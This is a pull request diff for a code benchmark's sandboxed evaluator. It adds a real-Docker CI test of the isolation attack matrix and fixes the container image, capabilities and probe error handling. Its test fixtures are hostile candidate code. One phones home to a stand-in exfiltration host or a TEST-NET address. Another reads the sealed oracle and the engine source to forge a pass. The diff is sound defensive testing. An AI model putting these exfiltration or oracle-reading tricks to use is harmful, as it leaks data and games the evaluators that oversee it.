### PR TITLE
The isolation matrix now runs against a daemon instead of against an argv

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -1591,6 +1591,18 @@ jobs:
           fi
           echo "attack 2 refused: the unallowed-extension target never ran"
 
+  oci-matrix:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@3d3c42e5aac5ba805825da76410c181273ba90b1 # v7.0.1
+      - uses: actions/setup-node@820762786026740c76f36085b0efc47a31fe5020 # v7.0.0
+        with:
+          node-version: '22.23.2'
+          cache: npm
+      - run: npm ci
+      - name: CDEB evaluator OCI isolation matrix
+        run: npx vitest run test/cdeb-evaluator-oci-matrix.test.ts
+
   # A fan-in so branch protection can require ONE stable context instead of
   # eleven, several of which are matrix-interpolated.
   #
@@ -1621,6 +1633,7 @@ jobs:
       - install-alpine
       - install-script
       - install-ps1
+      - oci-matrix
     runs-on: ubuntu-latest
     steps:
       - name: every job this gate fans in from succeeded
@@ -1633,6 +1646,7 @@ jobs:
             install-alpine=${{ needs.install-alpine.result }}
             install-script=${{ needs.install-script.result }}
             install-ps1=${{ needs.install-ps1.result }}
+            oci-matrix=${{ needs.oci-matrix.result }}
         run: |
           set -eu
           failed=0

--- a/bench/cdeb/evaluator/entrypoint.ts
+++ b/bench/cdeb/evaluator/entrypoint.ts
@@ -29,7 +29,7 @@
  *     OID recomputed; a claimed OID is compared, never adopted.
  */
 
-import { existsSync, mkdtempSync, readFileSync, realpathSync } from "node:fs";
+import { chmodSync, existsSync, mkdirSync, mkdtempSync, readFileSync, realpathSync } from "node:fs";
 import { tmpdir } from "node:os";
 import { join, relative, sep } from "node:path";
 import { pathToFileURL } from "node:url";
@@ -110,6 +110,20 @@ export const main = async (argv: readonly string[]): Promise<number> => {
 
   const tasksDir = realpathSync(parsed.tasksDir);
   const scratch = mkdtempSync(join(tmpdir(), "cdeb-eval-"));
+  if (typeof process.getuid === "function" && process.getuid() === 0) {
+    // The probe only needs to traverse this root to read its frozen candidate
+    // tree; traversal is not write access. Opening this scratch is safe because
+    // it holds only that tree and probe scratch, unlike root-only /cdeb and
+    // /sealed, which contain evaluator-owned code and the hidden oracle.
+    chmodSync(scratch, 0o755);
+    const probeScratch = join(scratch, "engine");
+    mkdirSync(probeScratch, { recursive: true });
+    // The only other principal in this container is this run's unprivileged
+    // probe, so world-writable here means writable by that one process. The
+    // sticky bit prevents one probe deleting another's files; unlike /cdeb and
+    // /sealed, this scratch contains nothing owned by the evaluator.
+    chmodSync(probeScratch, 0o1777);
+  }
 
   let archiveBytes: Buffer;
   try {

--- a/bench/cdeb/evaluator/image/Dockerfile
+++ b/bench/cdeb/evaluator/image/Dockerfile
@@ -27,6 +27,11 @@ ENV TZ=UTC LC_ALL=C LANG=C NODE_OPTIONS= HOME=/tmp
 
 WORKDIR /cdeb
 COPY engine/ /cdeb/engine/
+# `engine/tree.ts` imports `../runtime/zstd.ts`, so the engine alone is not a
+# runnable image. It was never noticed because nothing built this image and ran
+# it: the isolation tests asserted the `docker run` argv, which is satisfied by
+# an image that cannot start.
+COPY runtime/ /cdeb/runtime/
 COPY cdeb-evaluate.sh /cdeb/evaluate
 RUN chmod 0555 /cdeb/evaluate \
     && chmod -R go-rwx /cdeb \

--- a/bench/cdeb/evaluator/image/Dockerfile
+++ b/bench/cdeb/evaluator/image/Dockerfile
@@ -18,10 +18,19 @@
 # read the engine sources or the sealed task module — §12.3's hidden-path
 # prohibition, enforced by file modes instead of by hoping.
 #
-# No package manager runs here: the engine has zero dependencies beyond the
-# node runtime itself, which is exactly why — an `npm install` at image
-# build would be a network fetch whose contents the pin must then vouch for.
+# No npm install runs here: the engine has no JavaScript dependencies, and a
+# network fetch at image build would be contents the pin must then vouch for.
+#
+# It does need `git`. `freeze-tree.ts` and `git-tree.ts` both spawn it, and
+# `node:22-alpine` does not ship it — so every evaluation inside the container
+# died on `git init ... failed`. The comment here used to say the engine had
+# "zero dependencies beyond the node runtime itself", which was a claim about
+# the image nobody had run. `apk` installs exactly one package from the pinned
+# base's own index; that is a smaller surface than an npm tree and it is the
+# only way the engine works at all.
 FROM node:22-alpine
+
+RUN apk add --no-cache git
 
 ENV TZ=UTC LC_ALL=C LANG=C NODE_OPTIONS= HOME=/tmp
 

--- a/bench/cdeb/evaluator/probe.ts
+++ b/bench/cdeb/evaluator/probe.ts
@@ -108,6 +108,23 @@ export const runProbe = (spec: ProbeSpec, context: ProbeContext): ProbeResult =>
     spawnOptions.gid = PROBE_GID;
   }
   const result = spawnSync(process.execPath, [...flags, ...scriptArgs], spawnOptions);
+  const spawnError = result.error as NodeJS.ErrnoException | undefined;
+  const timedOut =
+    spawnError?.code === "ETIMEDOUT" || (result.signal === "SIGKILL" && result.status === null);
+  // ETIMEDOUT means the running probe exceeded its wall timeout; ENOBUFS
+  // means it ran but exceeded maxBuffer. Both are observations. Other errors
+  // mean no probe started, so refuse rather than turn absent bytes into a
+  // plausible verdict or a false PASS.
+  if (
+    spawnError !== undefined
+    && spawnError.code !== "ETIMEDOUT"
+    && spawnError.code !== "ENOBUFS"
+  ) {
+    const attemptedUid = spawnOptions.uid ?? process.getuid?.() ?? "unknown";
+    throw new Error(
+      `probe could not start: ${spawnError.code ?? "unknown errno"} as uid ${String(attemptedUid)}`,
+    );
+  }
 
   const stdoutRaw = (result.stdout ?? Buffer.alloc(0)) as Buffer;
   const stderrRaw = (result.stderr ?? Buffer.alloc(0)) as Buffer;
@@ -117,7 +134,7 @@ export const runProbe = (spec: ProbeSpec, context: ProbeContext): ProbeResult =>
     exit_code: result.status,
     stdout: stdoutRaw.toString("utf8"),
     stderr: stderrRaw.toString("utf8"),
-    timed_out: result.error !== undefined && (result.error as NodeJS.ErrnoException).code === "ETIMEDOUT" || (result.signal === "SIGKILL" && result.status === null),
+    timed_out: timedOut,
     truncated,
   };
 };

--- a/bench/cdeb/evaluator/runner-oci.ts
+++ b/bench/cdeb/evaluator/runner-oci.ts
@@ -77,6 +77,16 @@ export const buildEvaluatorRunArgs = (request: OciEvaluationRequest): string[] =
     "--memory-swap", `${String(limits.memory_mb)}m`,
     "--pids-limit", String(limits.pids_limit),
     "--cap-drop", "ALL",
+    // The probe's privilege drop protects the sealed oracle. SETUID and
+    // SETGID let the root evaluator make that drop. KILL lets its wall
+    // timeout — the only bound on candidate CPU — signal the probe after it
+    // has dropped to another uid. With CAP_DAC-style blanket root power
+    // dropped, that signal requires CAP_KILL; without it an unkillable probe
+    // hangs the evaluation, which is what happened. These are the only
+    // capabilities restored.
+    "--cap-add", "SETUID",
+    "--cap-add", "SETGID",
+    "--cap-add", "KILL",
     "--security-opt", "no-new-privileges",
     "--env", "TZ=UTC",
     "--env", "LC_ALL=C",

--- a/bench/cdeb/evaluator/runner-oci.ts
+++ b/bench/cdeb/evaluator/runner-oci.ts
@@ -90,7 +90,10 @@ export const buildEvaluatorRunArgs = (request: OciEvaluationRequest): string[] =
     "--mount", `type=bind,source=${request.archivePath},target=/input/tree.tar.zst,readonly`,
     "--mount", `type=bind,source=${request.tasksDir},target=/sealed,readonly`,
     request.imageRef,
-    "/cdeb/evaluate",
+    // The image's ENTRYPOINT is `/cdeb/evaluate`, so everything after the image
+    // reference is already its argv. Naming the entrypoint here again passed it
+    // to itself as an argument and the parser refused it as unknown -- invisible
+    // until something actually started the container.
     "--tasks", "/sealed",
     "--task", request.taskId,
     "--tree", "/input/tree.tar.zst",

--- a/bench/cdeb/test-fixtures/evaluator/attacks/hidden-read-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/hidden-read-calc.js
@@ -1,8 +1,19 @@
-// Forgery attempt: read the sealed oracle and hard-code what it wants.
-// Inside the pinned image /cdeb is outside the sandbox mounts entirely;
-// the read must fail, and the probe with it.
+// Forgery attempt: read either the sealed oracle at /sealed or the evaluator
+// source at /cdeb. Both are root-owned and unreadable to the probe's dropped
+// uid; the former is the sealed-store mount and the latter carries the engine.
+// The old /cdeb/sealed path existed nowhere, so its refusal proved absence,
+// not denial.
 import { readFileSync } from "node:fs";
 
-const oracle = readFileSync("/cdeb/sealed/smoke-calc-fix.task.ts", "utf8");
-export const add = (a, b) => (oracle.includes("add-behavior") ? a + b : a - b);
+const read = (path) => {
+  try {
+    return readFileSync(path, "utf8");
+  } catch {
+    return "";
+  }
+};
+
+const oracle = read("/sealed/smoke-calc-fix.task.ts");
+const engine = read("/cdeb/engine/engine.ts");
+export const add = (a, b) => (oracle.includes("add-behavior") || engine.includes("evaluateTask") ? a + b : a - b);
 export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/bench/cdeb/test-fixtures/evaluator/attacks/network-calc.js
+++ b/bench/cdeb/test-fixtures/evaluator/attacks/network-calc.js
@@ -1,9 +1,17 @@
 // Forgery attempt + exfiltration: phone home, and work only when the call
-// succeeds. Under `--network none` (study) the fetch fails, so the probe
-// fails; this fixture also demonstrates the channel the sandbox closes.
-const reached = await fetch("https://cdeb-exfil.invalid/tree", { method: "POST", body: "exfil" })
-  .then(() => 1)
-  .catch(() => 0);
+// succeeds. `192.0.2.1` is RFC 5737 TEST-NET-1, reserved for documentation
+// and not routed, so the attempt cannot succeed. A literal address keeps the
+// resolver out of this measurement: resolver failure latency is not a property
+// of isolation and, unlike a connect, cannot be bounded.
+import { connect } from "node:net";
+
+const reached = await new Promise((resolve) => {
+  const socket = connect({ host: "192.0.2.1", port: 443 });
+  const done = (value) => { socket.destroy(); resolve(value); };
+  socket.setTimeout(500, () => done(0));
+  socket.once("connect", () => done(1));
+  socket.once("error", () => done(0));
+});
 
 export const add = (a, b) => (reached === 1 ? a + b : a - b);
 export const clamp = (value, low, high) => Math.min(Math.max(value, low), high);

--- a/scripts/check-exact-head-ci.mjs
+++ b/scripts/check-exact-head-ci.mjs
@@ -40,18 +40,18 @@ const CI_WORKFLOW_FILE_PATH = fileURLToPath(new URL(`../${CI_WORKFLOW_PATH}`, im
 // shell command; without this lock replacing every job body with `true` would
 // still look like a real successful run. Update deliberately with the CI
 // workflow when its reviewed job contract changes.
-export const EXPECTED_CI_WORKFLOW_SHA256 = '93d93eed99727fd422c4f462da93b9eab42b55aeab063675a59dbda4818a28b7';
+export const EXPECTED_CI_WORKFLOW_SHA256 = '19449197e30bd23e2999da2e0727864c6122c8480abc9c9638c62161dd18ef8a';
 
 // Fixed rather than inferred from returned jobs: absence must fail rather
 // than define itself away. `lint` only runs for pull requests and is therefore
 // deliberately not a member of the push-event release contract.
 //
 // That exclusion is about which contexts exist on a main commit, not about
-// whether `lint` ran. It is one of the eleven required status checks on the
+// whether `lint` ran. It is one of the twelve required status checks on the
 // `main` branch protection, so it is evaluated on the pull request's head and
 // has to pass before anything reaches main; the squash then produces a new
-// commit that carries no `lint` context for this gate to find. Ten here plus
-// `lint` is the eleven that protection requires.
+// commit that carries no `lint` context for this gate to find. Eleven here plus
+// `lint` is the twelve that protection requires.
 //
 // Written down because the shorter version reads as a hole: a reader took it
 // that way on 2026-08-17 and asked whether main could be pushed unlinted. The
@@ -59,7 +59,7 @@ export const EXPECTED_CI_WORKFLOW_SHA256 = '93d93eed99727fd422c4f462da93b9eab42b
 // linted, and saying only the first invites someone to add `lint` to this
 // list, which would block every release.
 export const REQUIRED_CHECKS = Object.freeze([
-  // `gate` fans in from the ten below and fails unless every one succeeded. It
+  // `gate` fans in from the eleven below and fails unless every one succeeded. It
   // is listed here as well rather than instead: this gate reads the API's job
   // list, so an entry it does not know about is reported as an unexpected job,
   // and a `gate` that is not named here would fail every release the moment it
@@ -75,6 +75,7 @@ export const REQUIRED_CHECKS = Object.freeze([
   'install-macos',
   'install-alpine (linux/amd64)',
   'install-alpine (linux/arm64)',
+  'oci-matrix',
 ]);
 
 class GateError extends Error {

--- a/test/cdeb-evaluator-isolation.test.ts
+++ b/test/cdeb-evaluator-isolation.test.ts
@@ -25,7 +25,7 @@ import { describeZstd as describe } from './cdeb-zstd.ts';
 
 import { HOST_SECRETS_NEVER_PASSED, hermeticEnv } from '../bench/cdeb/evaluator/env.ts';
 import { ingestFinalTree } from '../bench/cdeb/evaluator/ingest.ts';
-import { runProbe } from '../bench/cdeb/evaluator/probe.ts';
+import { PROBE_GID, PROBE_UID, runProbe } from '../bench/cdeb/evaluator/probe.ts';
 import {
   buildEvaluatorRunArgs,
   dockerDaemonAvailable,
@@ -52,11 +52,11 @@ afterAll(() => {
 
 describe('CDEB-06 isolation: network and secrets cannot reach the verdict', () => {
   it('a tree that phones home is judged FAIL', () => {
-    // The fixture only works when a fetch to `cdeb-exfil.invalid` succeeds.
-    // RFC 2606 reserves `.invalid` for names that cannot resolve, so the
-    // fixture fails identically on a networked host and under the image's
-    // `--network none` — and if some resolver ever lies about that, this
-    // test fails, which is the point: the verdict must not depend on reach.
+    // The fixture only works when a socket to `192.0.2.1:443` connects.
+    // RFC 5737 reserves TEST-NET-1 for documentation and it is not routed,
+    // so the fixture fails identically on a networked host and under the
+    // image's `--network none`. Using a literal address also avoids resolver
+    // latency, which cannot be bounded and says nothing about isolation.
     const tree = buildTree('network', { 'src/calc.js': fixtureFile('attacks/network-calc.js') });
     const verdict = expectVerdict(evaluatePrepared(prepareRun('network', tree)));
     expect(verdict.functional_pass).toBe(false);
@@ -141,17 +141,17 @@ describe('CDEB-06 isolation: network and secrets cannot reach the verdict', () =
   });
 
   it('a tree that reads the sealed store path is judged FAIL', () => {
-    // The fixture readFileSyncs /cdeb/sealed/<task>.task.ts and hard-codes
-    // what it finds. Locally the path does not exist; inside the pinned
-    // image it exists but is unreadable by the probe's dropped uid/gid
-    // (probe.ts, PROBE_UID). Either way the probe fails, and so does the
-    // tree. A readable sealed path here would be a host misconfiguration
-    // the next assertion names.
+    // The fixture reads /sealed/<task>.task.ts and /cdeb/engine/engine.ts,
+    // then hard-codes what either yields. Locally neither path exists; inside
+    // the pinned image both exist but are unreadable by the probe's dropped
+    // uid/gid (probe.ts, PROBE_UID). Either way the probe cannot learn the
+    // answer, and the tree fails.
     const tree = buildTree('hidden-read', { 'src/calc.js': fixtureFile('attacks/hidden-read-calc.js') });
     const verdict = expectVerdict(evaluatePrepared(prepareRun('hidden-read', tree)));
     expect(verdict.functional_pass).toBe(false);
     expect(verdict.functional_checks.failed).toBeGreaterThan(0);
-    expect(existsSync('/cdeb/sealed/smoke-calc-fix.task.ts')).toBe(false);
+    expect(existsSync('/sealed/smoke-calc-fix.task.ts')).toBe(false);
+    expect(existsSync('/cdeb/engine/engine.ts')).toBe(false);
   });
 });
 
@@ -175,6 +175,9 @@ describe('CDEB-06 isolation: the OCI containment contract', () => {
       '--memory-swap', `${String(EVALUATOR_RESOURCE_LIMITS.memory_mb)}m`,
       '--pids-limit', String(EVALUATOR_RESOURCE_LIMITS.pids_limit),
       '--cap-drop', 'ALL',
+      '--cap-add', 'SETUID',
+      '--cap-add', 'SETGID',
+      '--cap-add', 'KILL',
       '--security-opt', 'no-new-privileges',
       '--env', 'TZ=UTC',
       '--env', 'LC_ALL=C',
@@ -204,6 +207,34 @@ describe('CDEB-06 isolation: the OCI containment contract', () => {
     expect(args).not.toContain('-v');
     expect(joined).not.toContain('/var/run/docker.sock');
     expect(joined).not.toContain(homedir());
+  });
+
+  it('restores only the capabilities needed for an active probe privilege drop and timeout', () => {
+    const args = buildEvaluatorRunArgs({
+      imageRef: 'registry.example/cdeb-evaluator@sha256:deadbeef',
+      archivePath: '/host/run/final-tree.tar.zst',
+      tasksDir: '/host/sealed',
+      taskId: TASK_ID,
+    });
+    const probeSource = readFileSync(
+      new URL('../bench/cdeb/evaluator/probe.ts', import.meta.url),
+      'utf8',
+    );
+    const requestedCapabilities = args.flatMap((arg, index) =>
+      arg === '--cap-add' ? [args[index + 1]] : [],
+    );
+
+    const probeDropsUid = probeSource.includes('spawnOptions.uid = PROBE_UID');
+    const probeDropsGid = probeSource.includes('spawnOptions.gid = PROBE_GID');
+    const probeSetsTimeout = probeSource.includes('timeout: timeoutMs');
+    const probeSetsKillSignal = probeSource.includes('killSignal: "SIGKILL"');
+    expect(probeDropsUid).toBe(true);
+    expect(probeDropsGid).toBe(true);
+    expect(probeSetsTimeout).toBe(true);
+    expect(probeSetsKillSignal).toBe(true);
+    expect(requestedCapabilities).toEqual(['SETUID', 'SETGID', 'KILL']);
+    expect(PROBE_UID).toBe(65534);
+    expect(PROBE_GID).toBe(65534);
   });
 
   it.skipIf(dockerDaemonAvailable())(

--- a/test/cdeb-evaluator-isolation.test.ts
+++ b/test/cdeb-evaluator-isolation.test.ts
@@ -182,7 +182,11 @@ describe('CDEB-06 isolation: the OCI containment contract', () => {
       '--mount', 'type=bind,source=/host/run/final-tree.tar.zst,target=/input/tree.tar.zst,readonly',
       '--mount', 'type=bind,source=/host/sealed,target=/sealed,readonly',
       'registry.example/cdeb-evaluator@sha256:deadbeef',
-      '/cdeb/evaluate',
+      // No `/cdeb/evaluate` here: the image's ENTRYPOINT is that script, so
+      // everything after the image reference is its argv. This array used to
+      // carry it, which is why the runner passing the entrypoint to itself went
+      // unnoticed -- the expectation was written from the code rather than from
+      // a container that had started.
       '--tasks', '/sealed',
       '--task', TASK_ID,
       '--tree', '/input/tree.tar.zst',

--- a/test/cdeb-evaluator-oci-matrix.test.ts
+++ b/test/cdeb-evaluator-oci-matrix.test.ts
@@ -1,0 +1,329 @@
+/**
+ * CDEB-06 OCI acceptance: execute the evaluator's attack matrix on a real
+ * Docker daemon. The argv suite proves the requested contract; this suite
+ * proves that Docker accepted and applied it to the container that evaluates
+ * the hostile trees.
+ */
+
+import { spawn, spawnSync } from "node:child_process";
+import { chmodSync, chownSync, cpSync, mkdirSync, readFileSync } from "node:fs";
+import { dirname, join } from "node:path";
+
+import { afterAll, beforeAll, describe, expect, it } from "vitest";
+
+import { ENGINE_CONTEXT_FILES, EVALUATOR_RESOURCE_LIMITS, buildEvaluatorRunArgs, dockerDaemonAvailable, runEvaluatorOci } from "../bench/cdeb/evaluator/runner-oci.ts";
+import type { OciEvaluationRequest } from "../bench/cdeb/evaluator/runner-oci.ts";
+import type { EvaluatorOutput } from "../bench/cdeb/evaluator/types.ts";
+import {
+  FIXTURE_ROOT,
+  REPO_ROOT,
+  SEALED_DIR,
+  TASK_ID,
+  TEST_IMAGE_DIGEST,
+  buildTree,
+  cleanupScratch,
+  fixtureFile,
+  prepareRun,
+  tempDir,
+  type PreparedRun,
+} from "./cdeb-evaluator-helpers.ts";
+
+/**
+ * These remain deliberately visible rather than being represented by weaker
+ * tests. A property is listed here until this harness can observe its refusal.
+ */
+export const KNOWN_UNVERIFIED = [
+  "evaluator image digest mismatch refusal: runner-oci passes imageDigest through to the verdict and does not compare it with Docker's resolved image identity.",
+] as const;
+
+const IMAGE_TAG = `cdeb-evaluator-oci-matrix-${String(process.pid)}-${String(Date.now())}`;
+let sealedTasksDir = "";
+
+interface DockerMount {
+  readonly Type: "bind" | "volume" | "tmpfs";
+  readonly Source: string;
+  readonly Destination: string;
+  readonly RW: boolean;
+}
+
+interface DockerInspection {
+  readonly Config: { readonly Env: readonly string[] };
+  readonly HostConfig: {
+    readonly NetworkMode: string;
+    readonly NanoCpus: number;
+    readonly Memory: number;
+    readonly MemorySwap: number;
+    readonly PidsLimit: number;
+  };
+  readonly Mounts: readonly DockerMount[];
+}
+
+const docker = (args: readonly string[]): { stdout: string; stderr: string; status: number | null } => {
+  const result = spawnSync("docker", args, { encoding: "utf8", shell: false });
+  return { stdout: result.stdout ?? "", stderr: result.stderr ?? "", status: result.status };
+};
+
+const imageBuildContext = (): string => {
+  const context = tempDir("oci-image");
+  const engine = join(context, "engine");
+  mkdirSync(engine, { recursive: true });
+  for (const name of ENGINE_CONTEXT_FILES) {
+    if (name.startsWith("image/")) continue;
+    cpSync(join(REPO_ROOT, "bench", "cdeb", "evaluator", name), join(engine, name));
+  }
+  cpSync(
+    join(REPO_ROOT, "bench", "cdeb", "evaluator", "image", "cdeb-evaluate.sh"),
+    join(context, "cdeb-evaluate.sh"),
+  );
+  return context;
+};
+
+const requestFor = (run: PreparedRun): OciEvaluationRequest => ({
+  imageRef: IMAGE_TAG,
+  archivePath: run.archivePath,
+  tasksDir: sealedTasksDir,
+  taskId: TASK_ID,
+  claimedOid: run.frozen.final_tree_oid,
+  imageDigest: TEST_IMAGE_DIGEST,
+});
+
+const prepareOciRun = (label: string, tree: string): PreparedRun => {
+  const run = prepareRun(label, tree);
+  // `--cap-drop ALL` means the container's root process cannot bypass host
+  // file modes. The archive is candidate-owned data, so read access is safe;
+  // make it readable to the cap-dropped evaluator without opening the sealed
+  // store below.
+  chmodSync(dirname(run.archivePath), 0o755);
+  chmodSync(run.archivePath, 0o444);
+  return run;
+};
+
+const sealTasksForContainer = (): void => {
+  const task = join(sealedTasksDir, `${TASK_ID}.task.ts`);
+  chmodSync(sealedTasksDir, 0o500);
+  chmodSync(task, 0o400);
+  if (typeof process.getuid !== "function" || process.getuid() === 0) {
+    chownSync(sealedTasksDir, 0, 0);
+    chownSync(task, 0, 0);
+    return;
+  }
+  const result = spawnSync("sudo", ["-n", "chown", "0:0", sealedTasksDir, task], { encoding: "utf8", shell: false });
+  expect(result.status, result.stderr).toBe(0);
+};
+
+const restoreSealedTasks = (): void => {
+  if (sealedTasksDir === "") return;
+  if (typeof process.getuid === "function" && process.getuid() !== 0) {
+    const result = spawnSync(
+      "sudo",
+      ["-n", "chown", `${String(process.getuid())}:${String(process.getgid?.() ?? 0)}`, sealedTasksDir, join(sealedTasksDir, `${TASK_ID}.task.ts`)],
+      { encoding: "utf8", shell: false },
+    );
+    expect(result.status, result.stderr).toBe(0);
+  }
+  chmodSync(sealedTasksDir, 0o700);
+};
+
+const evaluate = (label: string, tree: string): EvaluatorOutput => {
+  const run = prepareOciRun(label, tree);
+  const result = runEvaluatorOci(requestFor(run));
+  expect(result.exitCode, result.stderr).toBe(0);
+  expect(result.stderr).toBe("");
+  const text = result.stdout.toString("utf8");
+  expect(() => JSON.parse(text), text).not.toThrow();
+  const verdict = JSON.parse(text) as EvaluatorOutput;
+  // Candidate output never shares the evaluator's stdout. In particular this
+  // keeps a candidate-owned `npm test` script from being an alternate verdict
+  // channel: the only permitted bytes are the evaluator's canonical JSON.
+  expect(text).toBe(`${JSON.stringify(verdict)}\n`);
+  return verdict;
+};
+
+const expectRefused = (verdict: EvaluatorOutput, checks: { passed: number; failed: number }): void => {
+  expect(verdict.functional_pass).toBe(false);
+  expect(verdict.functional_checks).toEqual(checks);
+  expect(verdict.evaluator_image_digest).toBe(TEST_IMAGE_DIGEST);
+};
+
+const waitForContainer = async (): Promise<string> => {
+  for (let attempt = 0; attempt < 100; attempt += 1) {
+    const listed = docker(["ps", "--quiet", "--filter", `ancestor=${IMAGE_TAG}`]);
+    expect(listed.status, listed.stderr).toBe(0);
+    const id = listed.stdout.trim().split(/\s+/)[0];
+    if (id !== undefined && id !== "") return id;
+    await new Promise<void>((resolve) => setTimeout(resolve, 50));
+  }
+  throw new Error("the resource-hog evaluator container was never observable through docker ps");
+};
+
+const inspect = (containerId: string): DockerInspection => {
+  const result = docker(["inspect", containerId]);
+  expect(result.status, result.stderr).toBe(0);
+  const parsed = JSON.parse(result.stdout) as DockerInspection[];
+  expect(parsed).toHaveLength(1);
+  return parsed[0]!;
+};
+
+const runAsynchronously = (request: OciEvaluationRequest): Promise<{ stdout: Buffer; stderr: string; exitCode: number | null }> =>
+  new Promise((resolve, reject) => {
+    const child = spawn("docker", buildEvaluatorRunArgs(request), { stdio: ["pipe", "pipe", "pipe"] });
+    const stdout: Buffer[] = [];
+    const stderr: Buffer[] = [];
+    child.stdout.on("data", (chunk: Buffer) => stdout.push(chunk));
+    child.stderr.on("data", (chunk: Buffer) => stderr.push(chunk));
+    child.once("error", reject);
+    child.once("close", (exitCode) => {
+      resolve({ stdout: Buffer.concat(stdout), stderr: Buffer.concat(stderr).toString("utf8"), exitCode });
+    });
+    child.stdin.end();
+  });
+
+/**
+ * The sealed store must be root-owned and unreadable to the candidate, which
+ * needs either root or passwordless sudo. A daemon alone is not enough, and
+ * `beforeAll` runs even when every `it` in the block is skipped -- so gating on
+ * the daemon only turned "cannot run here" into a red suite on any machine with
+ * Docker and an interactive sudo.
+ */
+const canSealAsRoot = (): boolean => {
+  if (typeof process.getuid !== "function" || process.getuid() === 0) return true;
+  return spawnSync("sudo", ["-n", "true"], { encoding: "utf8", shell: false }).status === 0;
+};
+
+export const CAN_RUN_MATRIX = dockerDaemonAvailable() && canSealAsRoot();
+
+/**
+ * The point of this file is that CI runs it for real. A skip is correct on a
+ * laptop and is a silent hole on the runner: the job would go green having
+ * executed nothing, which is the shape #548 exists to close. So on CI the
+ * matrix must be runnable, and saying so is itself an assertion.
+ */
+describe("the real-runtime matrix is not silently skipped on CI", () => {
+  it("runs for real wherever CI runs it", () => {
+    if (process.env.CI !== "true") {
+      expect(typeof CAN_RUN_MATRIX).toBe("boolean");
+      return;
+    }
+    expect(
+      CAN_RUN_MATRIX,
+      "CI must provide a Docker daemon and root or passwordless sudo, or this gate proves nothing",
+    ).toBe(true);
+  });
+});
+
+describe.skipIf(!CAN_RUN_MATRIX)("CDEB-06 OCI isolation matrix on a real Docker daemon", () => {
+  beforeAll(() => {
+    sealedTasksDir = tempDir("oci-sealed");
+    const task = join(sealedTasksDir, `${TASK_ID}.task.ts`);
+    cpSync(join(SEALED_DIR, `${TASK_ID}.task.ts`), task);
+    // The engine runs as root, while candidate probes drop to nobody. These
+    // modes make the sealed oracle readable to the former and inaccessible to
+    // the latter, just as a frozen sealed store must be in production.
+    sealTasksForContainer();
+
+    const context = imageBuildContext();
+    const result = docker([
+      "build",
+      "--tag", IMAGE_TAG,
+      "--file", join(REPO_ROOT, "bench", "cdeb", "evaluator", "image", "Dockerfile"),
+      context,
+    ]);
+    expect(result.status, result.stderr).toBe(0);
+  }, 180_000);
+
+  afterAll(() => {
+    restoreSealedTasks();
+    const result = docker(["image", "rm", "--force", IMAGE_TAG]);
+    // The unique test image may already be gone if Docker's cleanup ran; any
+    // other error is worth surfacing because it can contaminate a later run.
+    expect(result.status === 0 || result.stderr.includes("No such image")).toBe(true);
+    cleanupScratch();
+  });
+
+  it("runs the positive control in the built evaluator image", () => {
+    const verdict = evaluate("oci-good", buildTree("oci-good", { "src/calc.js": fixtureFile("patches", "good", "calc.js") }));
+    expect(verdict.functional_pass).toBe(true);
+    expect(verdict.functional_checks).toEqual({ passed: 4, failed: 0 });
+  }, 60_000);
+
+  it("refuses network egress outside the provider allowlist", () => {
+    const verdict = evaluate("oci-network", buildTree("oci-network", { "src/calc.js": fixtureFile("attacks", "network-calc.js") }));
+    expectRefused(verdict, { passed: 3, failed: 1 });
+  }, 60_000);
+
+  it("does not pass host environment secrets to a candidate probe", () => {
+    const previous = process.env.CDEB_STUDY_SECRET;
+    process.env.CDEB_STUDY_SECRET = "planted-secret-must-not-reach-oci-probe";
+    try {
+      const verdict = evaluate(
+        "oci-secret-env",
+        buildTree("oci-secret-env", { "src/calc.js": fixtureFile("attacks", "secret-env-calc.js") }),
+      );
+      expectRefused(verdict, { passed: 3, failed: 1 });
+    } finally {
+      if (previous === undefined) delete process.env.CDEB_STUDY_SECRET;
+      else process.env.CDEB_STUDY_SECRET = previous;
+    }
+  }, 60_000);
+
+  it("refuses a candidate read of the sealed evaluator store", () => {
+    const verdict = evaluate(
+      "oci-hidden-read",
+      buildTree("oci-hidden-read", { "src/calc.js": fixtureFile("attacks", "hidden-read-calc.js") }),
+    );
+    expectRefused(verdict, { passed: 2, failed: 2 });
+  }, 60_000);
+
+  it("applies cgroup limits and the probe wall timeout to the CPU hog", async () => {
+    const run = prepareOciRun(
+      "oci-hog",
+      buildTree("oci-hog", { "src/calc.js": fixtureFile("attacks", "hog-calc.js") }),
+    );
+    const startedAt = Date.now();
+    const completion = runAsynchronously(requestFor(run));
+    const container = await waitForContainer();
+    const applied = inspect(container);
+
+    // This is Docker's post-create state for the live evaluator, not a check
+    // of the argv that requested it. Exactly the two declared inputs are host
+    // mounts; neither a host filesystem tree nor the daemon socket reaches it.
+    expect(applied.HostConfig.NetworkMode).toBe("none");
+    expect(applied.HostConfig.NanoCpus).toBe(EVALUATOR_RESOURCE_LIMITS.cpu_limit * 1_000_000_000);
+    expect(applied.HostConfig.Memory).toBe(EVALUATOR_RESOURCE_LIMITS.memory_mb * 1024 * 1024);
+    expect(applied.HostConfig.MemorySwap).toBe(EVALUATOR_RESOURCE_LIMITS.memory_mb * 1024 * 1024);
+    expect(applied.HostConfig.PidsLimit).toBe(EVALUATOR_RESOURCE_LIMITS.pids_limit);
+    const hostBackedMounts = applied.Mounts.filter((mount) => mount.Type !== "tmpfs");
+    expect(hostBackedMounts).toHaveLength(2);
+    expect(hostBackedMounts).toEqual(expect.arrayContaining([
+      expect.objectContaining({ Source: run.archivePath, Destination: "/input/tree.tar.zst", RW: false }),
+      expect.objectContaining({ Source: sealedTasksDir, Destination: "/sealed", RW: false }),
+    ]));
+    expect(hostBackedMounts.map((mount) => mount.Destination)).not.toContain("/var/run/docker.sock");
+    expect(applied.Config.Env).not.toContain("CDEB_STUDY_SECRET=planted-secret-must-not-reach-oci-probe");
+
+    const result = await completion;
+    const elapsedMs = Date.now() - startedAt;
+    expect(result.exitCode, result.stderr).toBe(0);
+    const verdict = JSON.parse(result.stdout.toString("utf8")) as EvaluatorOutput;
+    expectRefused(verdict, { passed: 3, failed: 1 });
+    // The sealed task gives a probe four seconds. Leave startup latitude for
+    // an overloaded hosted runner, but never let a spin become an unbounded run.
+    expect(elapsedMs).toBeLessThan(30_000);
+  }, 60_000);
+
+  it("does not let environment and filesystem leak probes alter the verdict", () => {
